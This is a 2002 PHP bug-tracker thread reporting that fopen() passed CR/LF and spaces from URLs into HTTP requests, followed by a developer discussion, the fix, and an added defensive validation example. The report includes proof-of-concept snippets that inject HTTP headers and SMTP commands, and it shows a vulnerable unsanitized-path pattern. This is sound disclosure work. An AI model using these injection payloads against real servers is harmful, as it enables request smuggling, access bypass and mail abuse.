Bug #19160 fopen doesn't remove space, CR, LF from URLs
Submitted: 2002-08-28 18:35 UTC Modified: 2002-09-10 04:37 UTC
Votes:3
Avg. Score:3.3 ± 1.7
Reproduced:1 of 2 (50.0%)
Same Version:1 (100.0%)
Same OS:0 (0.0%)
From: ulfh at update dot uu dot se Assigned: derick (profile)
Status: Closed Package: HTTP related
PHP Version: 4.2.2 OS: Linux (Red Hat, Debian)
Private report: No CVE-ID: None
 [2002-08-28 18:35 UTC] ulfh at update dot uu dot se
As you know, you can use URLs in fopen(), file() etc. when allow_url_fopen is On. Unfortunately, PHP doesn't remove spaces, tabs, CR or LF characters from the URL before constructing an HTTP query. This means that we can add arbitrary HTTP headers to the URL, like this:

<?php

$fp = fopen("http://www.site1.st/ HTTP/1.0\n".
            "Host: www.site2.st\n".
            "User-Agent: Nozilla/0.0\n".
            "Referer: http://www.metaur.nu/\n".
            "Cookie: user=ulf\n\n", "r");
fpassthru($fp);

?>

This program will display the contents of site2.st instead of site1.st, if they live on the same virtual host.

You can also use it for communication with other types of servers than HTTP servers:

<?php

$fp = fopen("http://mail.site1.st:25/ HTTP/1.0\n".
            "HELO my.own.machine\n".
            "MAIL FROM: <user@my.own.machine>\n".
            "RCPT TO: <info@site1.st>\n".
            "DATA\n".
            "From: user@my.own.machine\n".
            "To: info@site1.st\n".
            "Subject: This is..\n\n".
            "This is a URL that sends an e-mail (?).\n".
            ".\n".
            "QUIT\n\n", "r");
fpassthru($fp);

?>

Both the mail server and PHP will complain, but the mail still gets sent.

This can even lead to a security hole in a program like this:

<?php

$fp = fopen("http://www.site3.st/$path", "r");
fpassthru($fp);

?>

because it allows the user to break out of restrictions and access some other site than site3.st.

I have verified this behaviour in PHP 4.1.2, 4.2.2 and a CVS checkout from a few days ago. You fix it by removing all spaces, tabs, CR characters and LF characters from the URLs.

// Ulf Harnhammar
ulfh@update.uu.se
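One defensive way to handle the `$path` pattern from the last snippet above, as an added example that is not from the report or from PHP's own fix: it rejects the whitespace and control characters the report names instead of silently stripping them, then re-parses the assembled URL to confirm it still points at the intended host. It assumes PHP 7 or later; the host name and function names are illustrative.

```php
<?php
// Added example (not from the bug report): a defensive wrapper around the
// "http://www.site3.st/$path" pattern. The request line and headers are only
// reachable through whitespace and control characters, so those are refused
// outright rather than stripped. Function names are hypothetical.

function safe_path_component(string $path): string
{
    // Space, tab, CR and LF (the characters the report identifies) plus any
    // other control character end the request line early or start a new
    // header line, so none of them may appear in a path component.
    if (preg_match('/[\x00-\x20\x7f]/', $path)) {
        throw new InvalidArgumentException('control or whitespace character in path');
    }
    // Keep the request inside the intended prefix.
    if (strpos($path, '..') !== false) {
        throw new InvalidArgumentException('path traversal attempt');
    }
    return $path;
}

function build_site_url(string $path): string
{
    $url = 'http://www.site3.st/' . safe_path_component($path);
    // Re-parse the result and confirm scheme and host were not changed.
    $parts = parse_url($url);
    if ($parts === false
        || ($parts['scheme'] ?? '') !== 'http'
        || ($parts['host'] ?? '') !== 'www.site3.st') {
        throw new InvalidArgumentException('URL left the expected origin');
    }
    return $url;
}

// Constructed inputs: the first mirrors the header-injection payload from the
// report, the second is a benign path.
$candidates = ["index.html HTTP/1.0\nHost: www.site2.st\n\n", "docs/intro.html"];
foreach ($candidates as $candidate) {
    try {
        $url = build_site_url($candidate);
        echo "accepted: $url\n";
        // Only an accepted URL would be passed on to fopen($url, "r").
    } catch (InvalidArgumentException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
```

The first candidate is rejected at the character check, which is the point: the decision to refuse is made before any request is built.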

 [2002-08-28 18:51 UTC] rasmus@php.net
Seems like a feature to me.  Should probably be documented if we keep it, but there are many examples of functions in PHP that you should not be sending raw user data to.  Things like exec(), include(), readfile() and fopen() in the non-URL sense all need their inputs sanitized.
 [2002-08-28 18:59 UTC] ulfh at update dot uu dot se
Well, I disagree. URLs don't have any field for setting cookies or user agents, so being able to do that from a field that claims to contain a URL is a bug in my opinion.

// Ulf Harnhammar
 [2002-08-29 01:31 UTC] derick@php.net
I disagree too, assigning to me.

Derick
 [2002-09-10 04:37 UTC] sesser@php.net
This bug has been fixed in CVS.

In case this was a PHP problem, snapshots of the sources are packaged
every three hours; this change will be in the next snapshot. You can
grab the snapshot at http://snaps.php.net/.
 
In case this was a documentation problem, the fix will show up soon at
http://www.php.net/manual/.

In case this was a PHP.net website problem, the change will show
up on the PHP.net site and on the mirror sites in short time.
 
Thank you for the report, and for helping us make PHP better.


 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Fri Dec 13 08:01:24 2019 UTC